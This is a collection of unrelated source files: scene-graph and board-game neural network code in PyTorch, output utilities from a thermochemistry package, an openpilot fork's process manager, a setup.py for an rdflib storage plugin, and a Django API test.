box_priors.data) > 0) # if there are fewer then 100 things then we might as well add some? amt_to_add = 100 - rel_cands.long().sum() rel_cands = rel_cands.nonzero() if rel_cands.dim() == 0: rel_cands = im_inds.data.new(1, 2).fill_(0) rel_inds = torch.cat((im_inds.data[rel_cands[:, 0]][:, None], rel_cands), 1) return rel_inds def obj_feature_map(self, features, rois): """ Gets the ROI features :param features: [batch_size, dim, IM_SIZE/4, IM_SIZE/4] (features at level p2) :param rois: [num_rois, 5] array of [img_num, x0, y0, x1, y1]. 
:return: [num_rois, #dim] array """ feature_pool = RoIAlignFunction(self.pooling_size, self.pooling_size, spatial_scale=1 / 16)( features, rois) return self.roi_fmap_obj(feature_pool.view(rois.size(0), -1)) def forward(self, x, im_sizes, image_offset, gt_boxes=None, gt_classes=None, gt_rels=None, proposals=None, train_anchor_inds=None, return_fmap=False): """ Forward pass for detection :param x: Images@[batch_size, 3, IM_SIZE, IM_SIZE] :param im_sizes: A numpy array of (h, w, scale) for each image. :param image_offset: Offset onto what image we're on for MGPU training (if single GPU this is 0) :param gt_boxes: Training parameters: :param gt_boxes: [num_gt, 4] GT boxes over the batch. :param gt_classes: [num_gt, 2] gt boxes where each one is (img_id, class) :param train_anchor_inds: a [num_train, 2] array of indices for the anchors that will be used to compute the training loss. Each (img_ind, fpn_idx) :return: If train: scores, boxdeltas, labels, boxes, boxtargets, rpnscores, rpnboxes, rellabels if test: prob dists, boxes, img inds, maxscores, classes """ result = self.detector(x, im_sizes, image_offset, gt_boxes, gt_classes, gt_rels, proposals, train_anchor_inds, return_fmap=True) if result.is_none(): return ValueError("heck") im_inds = result.im_inds - image_offset boxes = result.rm_box_priors if self.training and result.rel_labels is None: assert self.mode == 'sgdet' result.rel_labels = rel_assignments(im_inds.data, boxes.data, result.rm_obj_labels.data, gt_boxes.data, gt_classes.data, gt_rels.data, image_offset, filter_non_overlap=True, num_sample_per_gt=1) rel_inds = self.get_rel_inds(result.rel_labels, im_inds, boxes) rois = torch.cat((im_inds[:, None].float(), boxes), 1) result.obj_fmap = self.obj_feature_map(result.fmap.detach(), rois) if self.use_ggnn_obj: result.rm_obj_dists = self.ggnn_obj_reason(im_inds, result.obj_fmap, result.rm_obj_labels if self.training or self.mode == 'predcls' else None) vr = self.visual_rep(result.fmap.detach(), rois, rel_inds[:, 1:]) if self.use_ggnn_rel: result.rm_obj_dists, result.obj_preds, result.rel_dists = self.ggnn_rel_reason( obj_fmaps=result.obj_fmap, obj_logits=result.rm_obj_dists, vr=vr, rel_inds=rel_inds, obj_labels=result.rm_obj_labels if self.training or self.mode == 'predcls' else None, boxes_per_cls=result.boxes_all ) else: result.rm_obj_dists, result.obj_preds, result.rel_dists = self.vr_fc_cls( obj_logits=result.rm_obj_dists, vr=vr, obj_labels=result.rm_obj_labels if self.training or self.mode == 'predcls' else None, boxes_per_cls=result.boxes_all) if self.training: return result twod_inds = arange(result.obj_preds.data) * self.num_classes + result.obj_preds.data result.obj_scores = F.softmax(result.rm_obj_dists, dim=1).view(-1)[twod_inds] # Bbox regression if self.mode == 'sgdet': bboxes = result.boxes_all.view(-1, 4)[twod_inds].view(result.boxes_all.size(0), 4) else: # Boxes will get fixed by filter_dets function. bboxes = result.rm_box_priors rel_rep = F.softmax(result.rel_dists, dim=1) return filter_dets(bboxes, result.obj_scores, result.obj_preds, rel_inds[:, 1:], rel_rep) def __getitem__(self, batch): """ Hack to do multi-GPU training""" batch.scatter() if self.num_gpus == 1: return self(*batch[0]) replicas = nn.parallel.replicate(self, devices=list(range(self.num_gpus))) outputs = nn.parallel.parallel_apply(replicas, [batch[i] for i in range(self.num_gpus)]) if self.training: return gather_res(outputs, 0, dim=0) return outputs
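

# --- Editor's addition: hedged illustration, not part of the original KERN code ---
# The "[:, 1:].max(1)[1] + 1" pattern used by the reasoning modules above picks
# the highest-scoring foreground class while skipping background column 0; the
# toy logits below are invented.
def _example_foreground_argmax():
    toy_logits = torch.tensor([[5.0, 0.1, 2.0],   # background scores highest but is skipped
                               [0.0, 3.0, 1.0]])
    return toy_logits[:, 1:].max(1)[1] + 1        # tensor([2, 1])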
the-stack_106_24289
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import torch from torch import nn import torch.nn.functional as F from . import utils as zutils from ..params import GameParams, ModelParams from .. import utils @zutils.register_model class DeepConvConvLogitModel(torch.jit.ScriptModule): __constants__ = ["c_prime", "h_prime", "w_prime", "mono", "conv_nets"] DEFAULT_NB_NETS = 13 DEFAULT_NNSIZE = 2 DEFAULT_NNKS = 3 DEFAULT_STRIDE = 1 DEFAULT_DILATION = 1 DEFAULT_POOLING = False DEFAULT_BN = False # DEFAULT_BN_AFFINE = False default_game_name = "Hex13" def __init__(self, game_params: GameParams, model_params: ModelParams): torch.jit.ScriptModule.__init__(self) if game_params.game_name is None: game_params.game_name = self.__class__.default_game_name self.game_name = game_params.game_name self.game_params = game_params info = zutils.get_game_info(game_params) c, h, w = self.c, self.h, self.w = info["feature_size"][:3] c_prime, h_prime, w_prime = self.c_prime, self.h_prime, self.w_prime = info[ "action_size" ][:3] if h_prime != h or w_prime != w: raise RuntimeError( f'The game "{self.game_name}" is not eligible to a conv-computed logit ' f'model such as "{self.__class__.__name__}" - try with ' f'"{self.__class__.__name__.replace("ConvLogit", "FCLogit")}" instead' ) # nb identical hidden layers (first layer excepted) if model_params.nb_nets is None: model_params.nb_nets = self.DEFAULT_NB_NETS nb_nets = model_params.nb_nets # nn size if model_params.nnsize is None: model_params.nnsize = self.DEFAULT_NNSIZE nnsize = model_params.nnsize # kernel size if model_params.nnks is None: model_params.nnks = self.DEFAULT_NNKS nnks = model_params.nnks # stride stride = self.DEFAULT_STRIDE # dilation dilation = self.DEFAULT_DILATION # padding padding = zutils.get_consistent_padding_from_nnks(nnks=nnks, dilation=dilation) # pooling if model_params.pooling is None: model_params.pooling = self.DEFAULT_POOLING pooling = model_params.pooling # batch norm if model_params.bn is None: model_params.bn = self.DEFAULT_BN bn = model_params.bn # # batch norm affine # if model_params.bn_affine is None: # model_params.bn_affine = self.DEFAULT_BN_AFFINE # bn_affine = model_params.bn_affine bn_affine = bn self.model_params = model_params mono = [ nn.Conv2d( c, int(nnsize * c), nnks, stride=stride, padding=padding, dilation=dilation, bias=not bn_affine, ) ] conv_nets = [ nn.Conv2d( int(nnsize * c), int(nnsize * c), nnks, stride=stride, padding=padding, dilation=dilation, bias=not bn_affine, ) for _ in range(nb_nets) ] if pooling: for i in range(nb_nets): conv_nets[i] = nn.Sequential( conv_nets[i], nn.MaxPool2d( kernel_size=nnks, padding=padding, stride=stride, dilation=dilation, ), ) if bn or bn_affine: mono.append( nn.BatchNorm2d(int(nnsize * c), track_running_stats=True, affine=bn_affine) ) for i in range(nb_nets): conv_nets[i] = nn.Sequential( conv_nets[i], nn.BatchNorm2d( int(nnsize * c), track_running_stats=True, affine=bn_affine ), ) self.mono = nn.Sequential(*mono) self.conv_nets = nn.ModuleList(conv_nets) self.v = nn.Linear(int(nnsize * c) * h * w, 1) self.pi_logit = nn.Conv2d( int(nnsize * c), c_prime, nnks, stride=stride, padding=padding, dilation=dilation ) @torch.jit.script_method def _forward(self, x: torch.Tensor, return_logit: bool): bs = x.shape[0] h = F.relu(self.mono(x)) for conv_net in self.conv_nets: h = F.relu(conv_net(h)) v = torch.tanh(self.v(h.flatten(1))) 
pi_logit = self.pi_logit(h).flatten(1) if return_logit: return v, pi_logit s = pi_logit.shape pi = F.softmax(pi_logit.flatten(1), 1).reshape(s) return v, pi @torch.jit.script_method def forward(self, x: torch.Tensor): v, pi_logit = self._forward(x, True) pi_logit = pi_logit.view(-1, self.c_prime, self.h_prime, self.w_prime) reply = {"v": v, "pi_logit": pi_logit} return reply
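

# --- Editor's addition: hedged aside, not part of the original model file ---
# The H x W-preserving constraint checked in __init__ relies on "same"-size
# padding for stride-1 convolutions: padding = dilation * (nnks - 1) // 2 for
# odd kernel sizes. The toy layer below only illustrates that relation.
def _example_same_padding(nnks: int = 3, dilation: int = 1):
    padding = dilation * (nnks - 1) // 2
    layer = nn.Conv2d(4, 4, nnks, stride=1, padding=padding, dilation=dilation)
    out = layer(torch.zeros(1, 4, 13, 13))
    return out.shape  # torch.Size([1, 4, 13, 13])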
the-stack_106_24291
############################# BEGIN FRONTMATTER ################################ # # # TEA - calculates Thermochemical Equilibrium Abundances of chemical species # # # # TEA is part of the PhD dissertation work of Dr. Jasmina # # Blecic, who developed it with coding assistance from # # undergraduate M. Oliver Bowman and under the advice of # # Prof. Joseph Harrington at the University of Central Florida, # # Orlando, Florida, USA. # # # # Copyright (C) 2014-2016 University of Central Florida # # # # This program is reproducible-research software: you can # # redistribute it and/or modify it under the terms of the # # Reproducible Research Software License as published by # # Prof. Joseph Harrington at the University of Central Florida, # # either version 0.3 of the License, or (at your option) any later # # version. # # # # This program is distributed in the hope that it will be useful, # # but WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # # Reproducible Research Software License for more details. # # # # You should have received a copy of the Reproducible Research # # Software License along with this program. If not, see # # <http://planets.ucf.edu/resources/reproducible/>. The license's # # preamble explains the situation, concepts, and reasons surrounding # # reproducible research, and answers some common questions. # # # # This project was started with the support of the NASA Earth and # # Space Science Fellowship Program, grant NNX12AL83H, held by # # Jasmina Blecic, Principal Investigator Joseph Harrington, and the # # NASA Science Mission Directorate Planetary Atmospheres Program, # # grant NNX12AI69G. # # # # See the file ACKNOWLEDGING in the top-level TEA directory for # # instructions on how to acknowledge TEA in publications. # # # # Visit our Github site: # # https://github.com/dzesmin/TEA/ # # # # Reach us directly at: # # Jasmina Blecic <[email protected]> # # # ############################## END FRONTMATTER ################################# import numpy as np from sys import stdout # ============================================================================= # This is an auxiliary program that allows each program to read the output of # the previous step so the data can be used in the next step. It also manages # the format for each output file and produces both machine-readable and # human-readable files. # # It contains the following functions: # readheader(): Reads the header file for the pipeline. # readoutput(): Reads output files produced and used by the pipeline. # output(): Writes machine readable output. # fancyout(): Writes human-readable output. # fancyout_results(): Writes final results in human-readable format. # printout(): Prints iteration number. # ============================================================================= def readheader(file): ''' Reads the current header file (one T-P) and returns data common to each step of TEA. It searches only for the required chemical data and fills out the output arrays. The function is used by balance.py, lagrange.py, lambdacorr.py, and iterate.py. Parameters ---------- file: ASCII file Header for the current layer in the atmosphere, e.g., one T-P Returns ------- pressure: float Current pressure. temp: float Current temperature. i: integer Number of molecular species. j: integer Number of elements speclist: string array Array containing names of molecular species. 
a: integer array Array of stoichiometric values for each element in the species. b: float array Array containing elemental abundances - ratio of the number density of a single element to the total sum of elemental number densities in the mixture. g_RT: float array Array containing chemical potentials for each species at the current T-P. ''' # Open header file to read f = open(file, 'r+') # Initiate reading the file from zero-th line l = 0 # Start indicates when data begins, begin with False so top comment is not # included in data start = False # Set marker for comments comment = '#' # Allocates lists of speclist = [] # species names a = [[]] # stoichiometric values c = [] # chemical potential # Read the file line by line and if correct line is found, assign the data # to corresponding variables and convert to floats/strings for line in f.readlines(): contents = [value for value in line.split()] # Boolean to check if the line is blank is_blank = (contents == []) # Check if non-blank line is comment or data if not is_blank: # Boolean to check if the line is comment is_comment = (contents[0][0] == comment) # If line is not comment or blank start reading if not start and contents[0][0].isdigit(): start = l if start: # Skip line if blank or comment if is_comment or is_blank: start += 1 # Read pressure elif (l == start): pressure = np.float([value for value in line.split()][0]) # Read temperature elif (l == start+1): temp = np.float([value for value in line.split()][0]) # Read elemental abundances elif (l == start+2): val = [value for value in line.split()] b = [float(u) for u in val[1:]] # Read species list, stoichiometry, and chemical potentials elif (l == start+3): val = [value for value in line.split()] speclist = np.append(speclist, val[0]) a = [[int(u) for u in val[1:-1]]] g_RT = np.float(val[-1]) elif (l > start+3): val = [value for value in line.split()] speclist = np.append(speclist, val[0]) a = np.append(a, [[int(u) for u in val[1:-1]]], axis=0) g_RT = np.append(g_RT, np.float(val[-1])) # Go to the next line of the file and check again l += 1 # Take the number of species and elements i = speclist.size j = a.shape[1] f.close() # Convert b array to list b = np.array(b).tolist() return pressure, temp, i, j, speclist, a, b, g_RT def readoutput(file): ''' This function reads output files made by the balance.py, lagrange.py and lambdacorr.py. It reads any iteration's output and returns the data in an array. Parameters ---------- file: ASCII file Header for the current layer in the atmosphere, i.e. one T-P Returns ------- header: string Name of the header file used. it_num: integer Iteration number. speclist: string array Array containing names of molecular species. y: float array Array containing initial mole numbers of molecular species for current iteration. x: float array Array containing final mole numbers of molecular species for current iteration. delta: float array Array containing change in mole numbers of molecular species for current iteration. y_bar: float Array containing sum of initial mole numbers for all molecular species for current iteration. x_bar: float Array containing sum of final mole numbers for all molecular species for current iteration. delta_bar: float Change in total mole numbers of all species. 
''' # Open output file to read f = open(file, 'r') # Allocate and fill out data array with all info data = [] for line in f.readlines(): l = [value for value in line.split()] data.append(l) # Close file f.close() # Take appropriate data header = data[0][0] # header name it_num = np.array(data[1]).astype(np.int)[0] # iteration number speclist = np.array(data[2]).astype(np.str) # species list y = np.array(data[3]).astype(np.float) # initial mole numbers x = np.array(data[4]).astype(np.float) # final mole numbers delta = np.array(data[5]).astype(np.float) # difference (x - y) y_bar = np.array(data[6]).astype(np.float)[0] # sum of y_i's x_bar = np.array(data[7]).astype(np.float)[0] # sum of x_i's delta_bar = np.array(data[8]).astype(np.float)[0] # difference in sums return(header, it_num, speclist, y, x, delta, y_bar, x_bar, delta_bar) def output(header, it_num, speclist, y, x, delta, y_bar, x_bar, delta_bar, file, verb=0): ''' This function produces machine-readable output files. The files are saved only if saveout = True in TEA.cfg file. The function is used by the balance.py, lagrange.py, and lambdacorr.py. The function writes the name of the header, current iteration number, species list, starting mole numbers of species for current iteration, final mole numbers of molecular species after the iteration is done, difference between starting and final mole numbers, total sum of initial mole numbers, total sum of final mole numbers and the change in total mole numbers of all species. Parameters ---------- header: string Name of the header file used. it_num: integer Iteration number. speclist: string array Array containing names of molecular species. y: float array Array containing initial mole numbers of molecular species for current iteration. x: float array Array containing final mole numbers of molecular species for current iteration. delta: float array Array containing change in mole numbers of molecular species for current iteration. y_bar: float Array containing sum of initial mole numbers for all molecular species for current iteration. x_bar: float Array containing sum of final mole numbers for all molecular species for current iteration. delta_bar: float Change in total mole numbers of all species. file: string Name of output file to be written. verb: Integer Verbosity level (0=mute, 1=quiet, 2=verbose). 
''' # Open file to write f = open(file, 'w+') # Count number of species i = speclist.size # Write the location of the header file f.write(header + '\n') # 1st row # Write current number of iteration f.write(np.str(it_num) + '\n') # 2nd row # Write species list for n in np.arange(i): # 3rd row f.write(speclist[n] + ' ') if n == (i-1): f.write('\n') # Write starting mole numbers of molecular species for that iteration for n in np.arange(i): # 4th row f.write(np.str(y[n]) + ' ') if n == (i-1): f.write('\n') # Write final mole numbers of molecular species after iteration is done for n in np.arange(i): # 5th row f.write(np.str(x[n]) + ' ') if n == (i-1): f.write('\n') # Write difference between initial and final mole numbers for n in np.arange(i): # 6th row f.write(np.str(delta[n]) + ' ') if n == (i-1): f.write('\n') # Write total sum of initial mole numbers f.write(np.str(y_bar) + '\n') # 7th row # Write total sum of final mole numbers f.write(np.str(x_bar) + '\n') # 8th row # Write difference of total mole numbers f.write(np.str(delta_bar) + '\n') # 9th row f.close() # Debugging check if verb > 1: print('\n\nMade file \'' + file + '\' containing machine data.') def fancyout(it_num, speclist, y, x, delta, y_bar, x_bar, delta_bar, file, verb=0): ''' This function produces human readable output files. The files are saved only if saveout = True in TEA.cfg file. The function is used by the balance.py, lagrange.py, and lambdacorr.py. The function writes the name of the header, current iteration number, species list, starting mole numbers of species for current iteration, final mole numbers of molecular species after the iteration is done, difference between starting and final mole numbers, total sum of initial mole numbers, total sum of final mole numbers and the change in total mole numbers of all species. If verb>1, all data written to the file is presented on-screen. Parameters ---------- it_num: integer Iteration number. speclist: string array Array containing names of molecular species. y: float array Array containing initial mole numbers of molecular species for current iteration. x: float array Array containing final mole numbers of molecular species for current iteration. delta: float array Array containing change in mole numbers of molecular species for current iteration. y_bar: float Array containing sum of initial mole numbers for all molecular species for current iteration. x_bar: float Array containing sum of final mole numbers for all molecular species for current iteration. delta_bar: float Change in total mole numbers of all species. file: string Name of output file to be written. verb: Integer Verbosity level (0=mute, 1=quiet, 2=verbose). ''' # Open file to write f = open(file, 'w+') # Write top comment and iteration number f.write('This .txt file is for visual use only. 
\ DO NOT USE FOR ITERATIONS!\n') f.write('Data for iteration #' + np.str(it_num) + '\n\n') # Count number of species i = speclist.size # Loop over all species for n in np.arange(i): if n == 0: # Write labels for columns f.write('Species |'.rjust(14) + 'y_i |'.rjust(14) + \ 'x_i |'.rjust(14) + 'delta \n'.rjust(15)) # Fill out variables xs = '%.4e'%x[n] # Final mole numbers ys = '%.4e'%y[n] # Initial mole numbers ds = '%.4e'%delta[n] # Difference between initial and final xbs = '%.4e'%x_bar # Total sum of final mole numbers ybs = '%.4e'%y_bar # Total sum of initial mole numbers dbs = '%.4e'%delta_bar # Difference of total sums name = speclist[n] # Species name # Write mole numbers in aligned columns f.write(name.rjust(12) + ' |' + ys.rjust(12) + ' |' + xs.rjust(12) + \ ' |' +ds.rjust(13) + '\n') # Write initial, final, and difference of totals after species data if n == (i - 1): f.write('\n') f.write('y_bar : '.rjust(35) + ybs.rjust(9) + '\n') f.write('x_bar : '.rjust(35) + xbs.rjust(9) + '\n') f.write('delta_bar : '.rjust(35) + dbs.rjust(9) + '\n') f.close() # Print for debugging purposes # Print all the data from the file on the screen if verb > 1: f = open(file, 'r+') h = 0 for line in f: if h == 0: print('Made file \'' + file + '\' containing the following:') else: line = line.strip('\n') print(line) h += 1 f.close() def fancyout_results(header, it_num, speclist, y, x, delta, y_bar, x_bar, delta_bar, pressure, temp, file, verb): ''' This function produces the final result output for each T-P in the human-readable format. The final mole number for each species is divided by the total mole numbers of all species in the mixture. This gives our final results, which is the mole fraction abundance for each species. This function is called by the iterate.py module. Parameters ---------- header: string Name of the header file used. it_num: integer Iteration number of last iteration. speclist: string array Array containing names of molecular species. y: float array Array containing initial mole numbers of molecular species for first iteration. x: float array Array containing final mole numbers of molecular species for last iteration. delta: float array Array containing change in mole numbers of molecular species for first and last iterations. y_bar: float Array containing sum of initial mole numbers for all molecular species for first iteration. x_bar: float Array containing sum of final mole numbers for all molecular species for last iteration. delta_bar: float Change in total mole numbers of all species. file: string Name of output file to be written. verb: Integer Verbosity level (0=mute, 1=quiet, 2=verbose). ''' # Open file to read f = open(file, 'w+') # Write top comment f.write('This .txt file is for visual use only.\n') f.write('These results are for the "' + header + '" run.\n') f.write('Iterations complete after ' + np.str(it_num) + ' runs at ' + \ np.str(pressure) + ' bar and ' + np.str(temp) + \ ' K. 
Final computation:\n\n') # Count number of species i = speclist.size # Loop over all species for n in np.arange(i): if n == 0: # Write labels for columns f.write('Species |'.rjust(10) + 'Initial x |'.rjust(16) + \ 'Final x |'.rjust(16) + 'Delta |'.rjust(16) + \ 'Final Abun \n'.rjust(16)) # Fill out variables xs = '%8.10f'%x[n] # Final mole numbers ys = '%8.10f'%y[n] # Initial mole numbers ds = '%8.10f'%delta[n] # Difference between initial and final xbs = '%8.10f'%x_bar # Total sum of final mole numbers ybs = '%8.10f'%y_bar # Total sum of initial mole numbers dbs = '%8.10f'%delta_bar # Difference of total sums # Divide final result by the total number of moles of the species # in the mixture, making mole fractions abn_float = x[n] / x_bar abn = '%8.7e'%abn_float # Species name name = speclist[n] # Write variables in aligned columns f.write(name.rjust(8) + ' |' + ys.rjust(14) + ' |' + xs.rjust(14) + \ ' |' +ds.rjust(14) + ' |' + abn.rjust(14) + '\n') # Write initial, final, and difference of totals after species data if n == (i - 1): f.write('\n') f.write('Initial Total Mol : '.rjust(35) + ybs.rjust(9) + '\n') f.write('Final Total Mol : '.rjust(35) + xbs.rjust(9) + '\n') f.write('Change in Total Mol : '.rjust(35) + dbs.rjust(9) + '\n') f.close() # Print all the data from the file on the screen if verb > 1: f = open(file, 'r+') h = 0 for line in f: if h == 0: print('Made file \'' + file + '\' containing the following:') else: line = line.strip('\n') print(line) h += 1 f.close() def printout(str, it_num=False): ''' Prints iteration progress number or other information in one line of terminal. Parameters ---------- str: string String defining what will be printed. it_num: integer Iteration number to be printed. If False, will print out contents of str instead. ''' # Create print-out for terminal that can be overwritten stdout.write('\r\n') if np.bool(it_num): # Print iteration number stdout.write(str % it_num) else: # Print other input stdout.write(str) # Clear printed value to allow overwriting for next stdout.flush()
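
# Minimal usage sketch (illustrative only, not part of the original TEA module):
# shows how fancyout() might be called directly with small toy arrays. The
# species names, mole numbers, and output filename below are made-up values
# chosen just to exercise the formatting code, and the sketch assumes a NumPy
# version that still provides the np.str alias used above (NumPy < 1.24).
if __name__ == '__main__':
    import numpy as np
    species = np.array(['H2', 'CO', 'CH4'])
    y_demo = np.array([0.50, 0.30, 0.20])
    x_demo = np.array([0.45, 0.35, 0.20])
    delta_demo = x_demo - y_demo
    fancyout(1, species, y_demo, x_demo, delta_demo,
             y_demo.sum(), x_demo.sum(), delta_demo.sum(),
             'demo_iteration.txt', verb=2)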
the-stack_106_24293
#!/usr/bin/env python3 import datetime import os import signal import subprocess import sys import traceback from multiprocessing import Process import cereal.messaging as messaging import selfdrive.crash as crash from common.basedir import BASEDIR from common.params import Params, ParamKeyType from common.text_window import TextWindow from selfdrive.boardd.set_time import set_time from selfdrive.hardware import HARDWARE, PC, EON from selfdrive.manager.helpers import unblock_stdout from selfdrive.manager.process import ensure_running, launcher from selfdrive.manager.process_config import managed_processes from selfdrive.athena.registration import register, UNREGISTERED_DONGLE_ID from selfdrive.swaglog import cloudlog, add_file_handler from selfdrive.version import dirty, get_git_commit, version, origin, branch, commit, \ terms_version, training_version, comma_remote, \ get_git_branch, get_git_remote from selfdrive.hardware.eon.apk import system sys.path.append(os.path.join(BASEDIR, "pyextra")) def manager_init(): # update system time from panda set_time(cloudlog) params = Params() params.clear_all(ParamKeyType.CLEAR_ON_MANAGER_START) default_params = [ ("OpenpilotEnabledToggle", "1"), ("CommunityFeaturesToggle", "1"), ("IsMetric", "1"), # add ("SshEnabled", "1"), ("LongControlSelect", "0"), ("AutoLaneChangeEnabled", "1"), ("PutPrebuilt", "0"), ("MfcSelect", "0"), ("LateralControlSelect", "0"), ("ShutdowndDisable", "1"), ("LoggerDisable", "0"), ("SccSmootherSlowOnCurves", "0"), ("SccSmootherSyncGasPressed", "0"), ("StockNaviDecelEnabled", "0"), ("NewRadarInterface", "0"), ] if not PC: default_params.append(("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8'))) if params.get_bool("RecordFrontLock"): params.put_bool("RecordFront", True) if not params.get_bool("DisableRadar_Allow"): params.delete("DisableRadar") # set unset params for k, v in default_params: if params.get(k) is None: params.put(k, v) # is this dashcam? 
if os.getenv("PASSIVE") is not None: params.put_bool("Passive", bool(int(os.getenv("PASSIVE")))) if params.get("Passive") is None: raise Exception("Passive must be set to continue") # Create folders needed for msgq try: os.mkdir("/dev/shm") except FileExistsError: pass except PermissionError: print("WARNING: failed to make /dev/shm") # set version params params.put("Version", version) params.put("TermsVersion", terms_version) params.put("TrainingVersion", training_version) params.put("GitCommit", get_git_commit(default="")) params.put("GitBranch", get_git_branch(default="")) params.put("GitRemote", get_git_remote(default="")) # set dongle id reg_res = register(show_spinner=True) if reg_res: dongle_id = reg_res else: serial = params.get("HardwareSerial") raise Exception(f"Registration failed for device {serial}") os.environ['DONGLE_ID'] = dongle_id # Needed for swaglog if not dirty: os.environ['CLEAN'] = '1' cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, device=HARDWARE.get_device_type()) if comma_remote and not (os.getenv("NOLOG") or os.getenv("NOCRASH") or PC): crash.init() crash.bind_user(id=dongle_id) crash.bind_extra(dirty=dirty, origin=origin, branch=branch, commit=commit, device=HARDWARE.get_device_type()) def manager_prepare(): for p in managed_processes.values(): p.prepare() def manager_cleanup(): for p in managed_processes.values(): p.stop() cloudlog.info("everything is dead") def manager_thread(): if EON: Process(name="shutdownd", target=launcher, args=("selfdrive.shutdownd",)).start() system("am startservice com.neokii.optool/.MainService") Process(name="road_speed_limiter", target=launcher, args=("selfdrive.road_speed_limiter",)).start() cloudlog.info("manager start") cloudlog.info({"environ": os.environ}) # save boot log #subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd")) params = Params() ignore = [] if params.get("DongleId", encoding='utf8') == UNREGISTERED_DONGLE_ID: ignore += ["manage_athenad", "uploader"] if os.getenv("NOBOARD") is not None: ignore.append("pandad") if os.getenv("BLOCK") is not None: ignore += os.getenv("BLOCK").split(",") ensure_running(managed_processes.values(), started=False, not_run=ignore) started_prev = False sm = messaging.SubMaster(['deviceState']) pm = messaging.PubMaster(['managerState']) while True: sm.update() not_run = ignore[:] if sm['deviceState'].freeSpacePercent < 5: not_run.append("loggerd") if params.get_bool("ShutdowndDisable"): not_run.append("shutdownd") if params.get_bool("LoggerDisable"): not_run.append("loggerd") not_run.append("deleter") not_run.append("logmessaged") not_run.append("tombstoned") not_run.append("uploader") started = sm['deviceState'].started driverview = params.get_bool("IsDriverViewEnabled") ensure_running(managed_processes.values(), started, driverview, not_run) # trigger an update after going offroad #if started_prev and not started and 'updated' in managed_processes: # os.sync() # managed_processes['updated'].signal(signal.SIGHUP) started_prev = started running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if p.proc.is_alive() else "\u001b[31m", p.name) for p in managed_processes.values() if p.proc] cloudlog.debug(' '.join(running_list)) # send managerState msg = messaging.new_message('managerState') msg.managerState.processes = [p.get_process_state_msg() for p in managed_processes.values()] pm.send('managerState', msg) # TODO: let UI handle this # Exit main loop when uninstall is needed if params.get_bool("DoUninstall"): break def main(): prepare_only = 
os.getenv("PREPAREONLY") is not None manager_init() # Start UI early so prepare can happen in the background if not prepare_only: managed_processes['ui'].start() manager_prepare() if prepare_only: return # SystemExit on sigterm signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1)) try: manager_thread() except Exception: traceback.print_exc() crash.capture_exception() finally: manager_cleanup() if Params().get_bool("DoUninstall"): cloudlog.warning("uninstalling") HARDWARE.uninstall() if __name__ == "__main__": unblock_stdout() try: main() except Exception: add_file_handler(cloudlog) cloudlog.exception("Manager failed to start") # Show last 3 lines of traceback error = traceback.format_exc(-3) error = "Manager failed to start\n\n" + error with TextWindow(error) as t: t.wait_for_exit() raise # manual exit because we are forked sys.exit(0)
the-stack_106_24294
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import re import codecs from setuptools import setup, find_packages kwargs = {} kwargs["install_requires"] = [ "setuptools", "rdflib>=6.0", "Cython", "lsm-db", "importlib-metadata; python_version < '3.8.0'", ] kwargs["dependency_links"] = [ "git+https://github.com/RDFLib/rdflib.git#egg=rdflib", "git+https://github.com/coleifer/python-lsm-db.git#egg=lsm-db" ] kwargs["tests_require"] = [ "pytest", "pytest-cov", "pytest-subtests", ] kwargs["extras_require"] = { "tests": kwargs["tests_require"], "docs": ["sphinx < 5", "sphinxcontrib-apidoc"], } def find_version(filename): _version_re = re.compile(r'__version__ = "(.*)"') for line in open(filename): version_match = _version_re.match(line) if version_match: return version_match.group(1) def open_local(paths, mode="r", encoding="utf8"): path = os.path.join(os.path.abspath(os.path.dirname(__file__)), *paths) return codecs.open(path, mode, encoding) # long_description=""" # An adaptation of RDFLib BerkeleyDB Store’s key-value approach, using Leveldb as a back-end. # Based on an original contribution by Drew Perttula. # """ with open_local(["README.md"], encoding="utf-8") as readme: long_description = readme.read() version = find_version("rdflib_sqlitelsm/__init__.py") packages = find_packages(exclude=("examples*", "test*")) if os.environ.get("READTHEDOCS", None): # if building docs for RTD # install examples, to get docstrings packages.append("examples") setup( name="rdflib-sqlitelsm", version=version, description="rdflib extension adding SQLite’s LSM as back-end store", author="RDFLib team", maintainer="Graham Higgins", maintainer_email="[email protected]", url="https://github.com/RDFLib/rdflib-sqlitelsm", license="bsd-3-clause", platforms=["any"], python_requires=">=3.7", classifiers=[ "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "License :: OSI Approved :: BSD License", "Topic :: Software Development :: Libraries :: Python Modules", "Operating System :: OS Independent", "Natural Language :: English", ], long_description=long_description, long_description_content_type="text/markdown", packages=packages, entry_points={ "rdf.plugins.store": [ "SQLiteLSM = rdflib_sqlitelsm.sqlitelsmstore:SQLiteLSMStore", ], }, **kwargs, )
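
# Illustrative usage note (not part of the original setup.py): once this package
# is installed, the "SQLiteLSM" entry point registered above should be loadable
# through rdflib's store plugin mechanism. The identifier and database path in
# this sketch are placeholders, and the exact open() configuration string is an
# assumption about this particular store.
#
#     from rdflib import Graph
#     g = Graph(store="SQLiteLSM", identifier="http://example.org/graph")
#     g.open("example.db", create=True)
#     g.close()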
the-stack_106_24296
from django.test import TestCase from django.urls import reverse class TestApi(TestCase): def test_decode_success(self): """ Ensure decode endpoint invokes decode successfully. """ response = self.client.get(reverse("api-decode"), data={"input": "226"}) self.assertEqual(response.status_code, 200) self.assertEqual(response.json(), {"result": ["BBF", "BZ", "VF"]}) def test_decode_input_invalid(self): """ Ensure decode endpoint returns 400 when given invalid input. """ response = self.client.get(reverse("api-decode"), data={"input": "abc"}) self.assertEqual(response.status_code, 400)
the-stack_106_24301
